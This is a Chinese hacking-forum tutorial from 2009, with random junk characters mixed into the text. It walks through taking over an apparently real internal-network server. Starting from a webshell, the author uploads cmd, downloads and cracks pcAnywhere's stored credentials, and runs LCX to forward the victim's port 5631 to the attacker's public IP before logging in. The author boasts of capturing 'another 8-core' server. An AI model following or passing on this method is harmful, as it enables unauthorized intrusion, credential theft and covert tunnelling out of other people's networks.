|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。* z/ {. k. J3 ^) X' E6 B6 \
' T5 J: O8 B0 W! u) M* w
提权方法:pcanywhere+LCX
. x3 _" ]. g7 N' E
6 I# D, K* x- i- J( Q获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。0 v. k" I% h9 Q+ h" f l
7 K9 F8 b' [" r; G u* W
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
7 ^. b$ l0 ], H! c! k' `& R
4 J, V% ~3 @; V6 `4 j! N7 ^) }6 V$ e+ m; r" k
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。8 Z5 u' \( Q) k/ N& R* J$ C3 c+ O
( ^$ u5 D" ^' w G* n. M3 I, Y: k6 O( S- Q9 I) g. {: N
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
. C* D& B# Q# B, q: K4 \
) J. W2 j9 Y0 S2 }1 H2 c5 }. Y+ ]; t
9 {1 F/ x4 x- ]( w" l- M) p/ D, q
0 _) p9 \) [: H7 B9 X由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``1 l0 u7 R$ g( h7 u
( @, [. C0 |7 w( ^; d' O" Z. l1 s# J+ L! L6 a0 T/ S. Y9 C! R
LCX的用法再简单说下:+ b, K0 P2 I5 P8 g- m
2 D, |$ e$ Q: @7 z. t; s- D5 ^
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
+ ~9 k' _- w0 }1 O1 S5 Y+ l4 S8 M
$ j6 F$ f& @; \! Y本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口) E. ]0 J4 S& R6 N8 {
9 I2 n8 M/ t; I! }8 ^+ v' }) N. }
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。2 z! h0 P4 h% o- L6 Y
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
& Q0 l: |7 B- n) a( a1 W
2 }2 B1 p Q k2 @1 O
3 t% [$ h2 C- A+ R4 P9 W
! V9 {# o( F, |! G. ]; w/ ?
$ c$ q) C! e$ p呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
1 V- L ]0 \* P9 A" @9 U# @9 @9 c
6 n" r* C d3 ~6 I8 ^' L- s* N( P
+ ^7 d% p: n- l$ {5 @8 d$ E$ m4 f: Q0 T5 n& w
. x( f) G5 B3 k1 I7 I/ N' u" ~" u我们本地连接试试,输入我们刚破解的账号密码
. y! S* ?' J. ~* E0 q4 b+ v5 y
" f/ U- |& f* T7 ?; W2 D9 L( k2 U5 _, a6 p4 s- {
呵呵``连接成功,服务器不错,又一个8核^︵^3 {# g$ `$ h* g! B1 i( b
$ @% E& C7 u6 z/ N( C
2 c! L9 q- U9 c2 H3 s$ `8 ]- \9 l" r- g, j/ y; o: l/ [
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
